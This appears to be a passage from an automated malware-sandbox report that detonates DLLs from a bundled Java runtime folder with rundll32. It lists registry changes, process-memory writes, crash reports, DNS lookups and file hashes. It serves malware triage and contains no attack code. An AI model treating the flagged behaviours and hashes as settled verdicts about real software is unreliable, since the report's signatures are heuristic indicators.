Set value (int) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000045c0dde48c11474f81d9a2c02be4ea220000000002000000000010660000000100002000000048158d8cdf3b8b978530881458b4774b380fad584beb8b7fbe722e19e8011149000000000e80000000020000200000006866b45e850ca05a50b7c61335e64e30f2f68819d938e3006986762a1b8c42c59000000007e620b7a8f328e73ba63bcde3d96b99baf86aac2dbe9702d87098a41adc8f315b5ba699236ab9dacd0c4ee33fe506d6f425f4124b0be9a63e6f2af7857999c6dada36f222841fc6d1a249f56297e65507cf44dbfddda66ff73b3634eed3fb66d2c71291dc63a68862a0584191df554b528efb4c2ae204db1eed112200686633a2b64a299fafbd7051738a160d6f9d784000000075dc1ef4d3c7a8e1a7568f7a70e0942b8854f8ed6e928fe442efb9871fba76e6f2073deffb7f4e49e592f33de7ab3a6feb2a83c7fffdc077d41855f5737047d8 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\DomainSuggestion C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A

Processes

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\jre\Welcome.html

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2284 CREDAT:275457 /prefetch:2

Network

Country Destination Domain Proto
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\CabEDDB.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Temp\TarEE6A.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 0ec9a4140e8244dbe3f9b879b5c22bc5
SHA1 31e3e366b57cfcc24f340a13a0f2158753cbd852
SHA256 ebbb7d858ff871287cc70d3a44666c3ed03cf697ecda0410aa0be24de84ad525
SHA512 df6200434f5ab24f73b2803126a5a5430850d632c12aae5bd5cc4a5964bd903d47b3cebb750e41563ed19b22ce799d964bcb60acbdbba57319b3fa69224dfae6

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 10f348810b256083f05c05673bdbf84c
SHA1 caabc2f0d064a7285de26a7d28af55c62fd2d440
SHA256 4910466e73486089139236f158e9ba4af883658c125a7fd2295c1a129af21cf6
SHA512 c2c3f3e3aff109b7d4dafd57d669989d7faa1b2cab4290e05046b89c7d06e702dffda6dcb64dc3ecc256b510be8e4316f2ce9238845b6fc75bef5bc1b1da95a3

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 0685124819f11c5562d61f8dd9c6f46d
SHA1 f0326952bc2f9a660770cb179347065391d9a3a1
SHA256 4794bdd23c4251f5c39f5bec2660f4945d9ec5c0ef10eddfa0ddd79493f1f963
SHA512 0f460934f31e9a4aeb2d76a6ecaf562c5d8b118ce680cfe31aba8d1b70e95bec0f057fcee638a15b38c483baf1ced53ecf9f659d1b3187e0614256b7b691b1e3

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 3dcb5a9bfa5da5cec462205e921dc4a6
SHA1 bae3db3a7b099813b90e64192a5f17552bc09d35
SHA256 5e4b6ffac44cd3badb6a67c0818ae109222b8ab5999529a9acf9fcca45537707
SHA512 f09ad1148aa7fb26151124dbd0ae1a58f2b4b64a9bf673c2eba44b952dc47015e449d882a7a1f506cf5fffa43c0d0ca840820086bc1afff0189129fd37c1f8c4

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 d826c86d0f105c17f73bb7fdcf18fd0d
SHA1 74f4716a67a64ddcd8290d40d25b1e89aef1239b
SHA256 77295ef490ff4aa3c1c23b719987c35dcd247cdf52504f1b26237a3ca1de8c26
SHA512 f7cc087582f499725d15c24136d3ef719c0f80f142413ce8d2e87a64aa5799f95c468e4e6b83e718c8c4e65a38138c256fae343738979560511ca7a518caceb5

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 5febcb4745031b0e80920653ec4d9bcb
SHA1 bed9031111c0b1a5ca01f59c682811150d35a68a
SHA256 80013ddfae8009596f44d468a8a8aa0a141ac58149a42f20f4ba889f541dc41b
SHA512 1accd066fba845a8185478bee2a85480977723efa5638b11f9de8e682a28c46f6e47fb232cdabf0eb99df149c2954c8428db7aa7d7370de54de09c04ebe3e00a

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 c2b455b13e2891f80e727e472048a792
SHA1 b033671820a3af31045c35d0ae0a4bd6a8da23c3
SHA256 2d73e17b680c6a8a4c8a1159ff682cea51234c1f0790948f789b202ee24c6eac
SHA512 c386e3578e739bdd79a734f3a65c939c891d3eac3b8c5dde0f23501ad8dc7cf4223d8d8186a1bffee213ea43c6e1c90464db77e89cc31d271471799119b558ff

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 3bc80a2cf207dbcd2b684f84ce0928d2
SHA1 98ca7e0a3cdaa6aa8603c2890a91d23d96a4c556
SHA256 3ff738059cb89209820f748e8b56fb8c70eae6b7a9eb8d6ca48b0cf4fa6aec6a
SHA512 43a3392d4733be4517123ee274f35af0c60791a0444605c7a1e298d28fbb88150aea2a469877ff94e204c98ce4891aa07f9ee27edfeaa8a3f72b38cc01884528

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 e849a0808462f9caf8a956735b229be7
SHA1 9dcf6f02e48074cb92da4da0ee451cad4ad1ac27
SHA256 10b52a339a552a125856e7633c9030a7bb4bcfefa473061fa6ac953094371cf8
SHA512 94caf6f5b2851e12fe9b308a5ab9a9a3ffa6a7cbbc45e9a4af32a369616a2ea7f43f7827efe5216f8cc358bab91cf5d33165e58c8332ed40a160432f971d907e

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 f5a2ffdf57d566736a31f021dc575127
SHA1 05e9388feb9f72a3de56df17bc50dfd9d04312d8
SHA256 6fe1fca054accd041df797adca4c6dd0e8a165c4c79491574e681a048b4c2e10
SHA512 9e55692b914ec93c46d6658973945e0adaf1b03ac0dd726890d4cb6d4bc223003070c050a344c26657febac37fe03ea4318bc4a0702051a11227d7cc0c39702a

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 7e2ca153b1ee6d25712915734c5293b5
SHA1 70ddf486d8ef088fc1ae39f402e07229d1df7b64
SHA256 79a4805b777bf69c5d58a663184d0ca32edafe7e983c34448a0836fcf577476b
SHA512 9397a7e799ccb00dfc40a72b142e1266c0505372b7bd596b3d6a85d5a48d1dd247bb4fa94daf3207dfc5b9515039ac192842a9c6c4f2b215e1d6cb044f3a50f7

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 de9702485425109b4737b0108cc6d2fb
SHA1 91139027e515529254e31a60e26398551d3d6cca
SHA256 5e86fbe5362e1d7d677f89fa89177f9dd4e0582058896b25bc1288b496e95399
SHA512 4c7c06458f90630a2e5f218e917f3aef04aa0b5bed1711fc6012834aee9dffc5d8c5bbcb39233bebd04b5f4ab4fbb7b61a0424c6a5d3568c533821c193f227ec

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 48972917c7dfe71091ebd8b464f6cd5b
SHA1 207840abeb2d97c979a4391f970db72ce2d31f4f
SHA256 e938469efdd046d26861b1961f83f1c4ca4a4f2464956cd1e7bfa2312121f237
SHA512 0109f925f9656046ffb8c1995b9f20076587b37cf8b4b163adf65034d99c9969f8d786f03cb1c4ced4a89a503d61f3708bcbf89ec2257e65740e33ad9f4de872

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 7708dc1810836fd3c31d1b98114c6456
SHA1 4c42fcf8c4789453deff51aa7217ce2ac8cdb53c
SHA256 71650edbf23d7dc54a9283cb944f9e7ed598255d83174b1b7d6c9438f734c900
SHA512 5e50a61c8845c52755644bfde200031390f233127b451ac3a79afaf44083169bc5afb682eb6f9ba7efb23411b3f4b84af3e7efbe9d85a9ec80b0b2fa4330dfc3

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 63733f420e43930fdd499cc13f52e71c
SHA1 31b4aa934675fc35df0c6c39f09fee4fd82e295a
SHA256 41d5c5174c72138615dff393f11721c322d74dd0988a81128fc2d11f78dca995
SHA512 c904b308fb9da425083a1e3ddeb902369379561bdcf946c28cead16a1f195f671d9b51d675c84a62b58414c0743de8ba941fa957db202dd62375db1ab8b8243d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 ccdabe60945c0f681ad8ed0d6f6ee843
SHA1 d2309dd9ee63386e106fd9bc873bc5288655896e
SHA256 a0ab24d525228a882e0d151e7e6a23fc1e73c449e18c58fc63142fb919bd08c9
SHA512 91030ee1aba1625655ea24473c84a21b8011eb222bfcc35e84390a31ee0c40d2dd913ec0ba4802b8ae4ba44ca6d1b48317a77d4fa529aa93c451631d72c679fa

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 aeecc204b465fafca77da2fea1938103
SHA1 ad3011de4104319a160f23bbc6f393378be9fa2f
SHA256 995e0be3b29957ced20c0a0b0bf172d339bed584e6e094dbdb003d03178c961b
SHA512 cc0d32bb32ab56ff32c4c4ff4565ce968912521d45dce05cf77ebf9bbc51fe2d9529f90c386e3a7917fad9457eb40c1fa3c9c277fdfd56db7950875b8f74c564

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 5c154d2a18eed7b38b24a9654af61801
SHA1 915a37e797416b7b40d64bb42339d3ea037c2cc1
SHA256 b0682d6a4523fbc2ca13a8d905d3a0c816750f9227c8f270bb3c3c16aa36f442
SHA512 bd4d34857983a6bcdf3ed8c78aa031f52fc6fe556aafa41adea9ce1b74f75f6be021ffcc0d70a1886600e24082f49cb64dd699b530da5dfdf35c50f20888c884

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 14492f034fd2828ad62c99e04c9c5e94
SHA1 cbc3fa9abd3dda7e0d8b5fd551e9882195b3bfd3
SHA256 c9ca9a7b7b43c86f62b2a51383614eae8f4c8f6b2ea21fec95b6ebaab3435517
SHA512 92f46d9aaedd6fdff122960c48f0cb7280b1d9451266251fd20bcb8075d665308ce1c4ceca061a931881f49c418d19553a93ac3bb1edea2f42463c2b51ca3541

Analysis: behavioral26

Detonation Overview

Submitted

2024-10-07 02:11

Reported

2024-10-07 02:15

Platform

win10v2004-20240802-en

Max time kernel

91s

Max time network

157s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\client\jvm.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3372 wrote to memory of 4464 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 3372 wrote to memory of 4464 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 3372 wrote to memory of 4464 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\client\jvm.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\client\jvm.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 4464 -ip 4464

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4464 -s 640

Network

Country Destination Domain Proto
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 68.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 241.42.69.40.in-addr.arpa udp
US 8.8.8.8:53 98.208.201.84.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral28

Detonation Overview

Submitted

2024-10-07 02:11

Reported

2024-10-07 02:15

Platform

win10v2004-20240802-en

Max time kernel

89s

Max time network

154s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\dcpr.dll,#1

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3904 wrote to memory of 2032 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 3904 wrote to memory of 2032 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 3904 wrote to memory of 2032 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\dcpr.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\dcpr.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 138.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 103.208.201.84.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral29

Detonation Overview

Submitted

2024-10-07 02:11

Reported

2024-10-07 02:15

Platform

win7-20240903-en

Max time kernel

105s

Max time network

19s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\decora_sse.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\decora_sse.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\decora_sse.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1616 -s 224

Network

N/A

Files

N/A

Analysis: behavioral12

Detonation Overview

Submitted

2024-10-07 02:11

Reported

2024-10-07 02:15

Platform

win10v2004-20240802-en

Max time kernel

150s

Max time network

100s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\JAWTAccessBridge.dll,#1

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2032 wrote to memory of 3320 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2032 wrote to memory of 3320 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2032 wrote to memory of 3320 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\JAWTAccessBridge.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\JAWTAccessBridge.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 2.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral25

Detonation Overview

Submitted

2024-10-07 02:11

Reported

2024-10-07 02:15

Platform

win7-20240708-en

Max time kernel

120s

Max time network

123s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\client\jvm.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\client\jvm.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\client\jvm.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1732 -s 228

Network

N/A

Files

N/A

Analysis: behavioral14

Detonation Overview

Submitted

2024-10-07 02:11

Reported

2024-10-07 02:15

Platform

win10v2004-20240802-en

Max time kernel

145s

Max time network

161s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\JavaAccessBridge-32.dll,#1

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 5044 wrote to memory of 4692 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 5044 wrote to memory of 4692 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 5044 wrote to memory of 4692 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\JavaAccessBridge-32.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\JavaAccessBridge-32.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 22.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 8.8.8.8:53 241.42.69.40.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral15

Detonation Overview

Submitted

2024-10-07 02:11

Reported

2024-10-07 02:15

Platform

win7-20240903-en

Max time kernel

117s

Max time network

125s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\JavaAccessBridge.dll,#1

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2416 wrote to memory of 2576 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2416 wrote to memory of 2576 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2416 wrote to memory of 2576 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2416 wrote to memory of 2576 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2416 wrote to memory of 2576 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2416 wrote to memory of 2576 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2416 wrote to memory of 2576 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\JavaAccessBridge.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\JavaAccessBridge.dll,#1

Network

N/A

Files

N/A

Analysis: behavioral17

Detonation Overview

Submitted

2024-10-07 02:11

Reported

2024-10-07 02:15

Platform

win7-20240903-en

Max time kernel

122s

Max time network

126s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\WindowsAccessBridge-32.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\WindowsAccessBridge-32.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\WindowsAccessBridge-32.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2352 -s 220

Network

N/A

Files

N/A

Analysis: behavioral20

Detonation Overview

Submitted

2024-10-07 02:11

Reported

2024-10-07 02:15

Platform

win10v2004-20240802-en

Max time kernel

91s

Max time network

160s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\WindowsAccessBridge.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4872 wrote to memory of 1628 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 4872 wrote to memory of 1628 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 4872 wrote to memory of 1628 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\WindowsAccessBridge.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\WindowsAccessBridge.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 1628 -ip 1628

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1628 -s 600

Network

Country Destination Domain Proto
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 75.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral30

Detonation Overview

Submitted

2024-10-07 02:11

Reported

2024-10-07 02:15

Platform

win10v2004-20240802-en

Max time kernel

147s

Max time network

155s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\decora_sse.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2456 wrote to memory of 976 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2456 wrote to memory of 976 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2456 wrote to memory of 976 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\decora_sse.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\decora_sse.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 976 -ip 976

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 976 -s 604

Network

Country Destination Domain Proto
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 71.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 241.42.69.40.in-addr.arpa udp
